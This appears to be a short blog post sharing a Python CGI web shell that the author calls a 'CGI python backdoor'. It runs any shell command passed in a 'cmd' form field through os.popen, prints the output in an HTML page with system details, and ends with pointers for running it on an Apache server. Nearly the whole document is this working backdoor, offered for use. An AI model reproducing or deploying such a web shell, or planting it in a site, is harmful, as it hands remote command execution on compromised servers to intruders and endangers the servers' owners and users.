#!/usr/bin/env python
# Info  : Linux based CGI backdoor with python
# author: otoy
# date  : 0x102010
 
import cgi,os,re,sys
 
form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)
 
dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]
 
osinf = os.uname()
info='''====================================
       CGI python backdoor
====================================
Author : otoy
Date   : 0x102010
Blog   : <a href="https://otoyrood.wordpress.com" target="_blak">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])
 
print "Content-type: text/html"
print
 
print"""
<html>
  <head>
    <title>CGI python backdoor</title>
  </head>
  <body>
    <pre>%s</pre>
    <form action='%s'>
       Command <input type='text' name='cmd' />
    <input type='submit' />
    </form>
    <pre>%s</pre>
  </body>
</html>
""" %(info,progfl,osexe.read())

in action :

PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.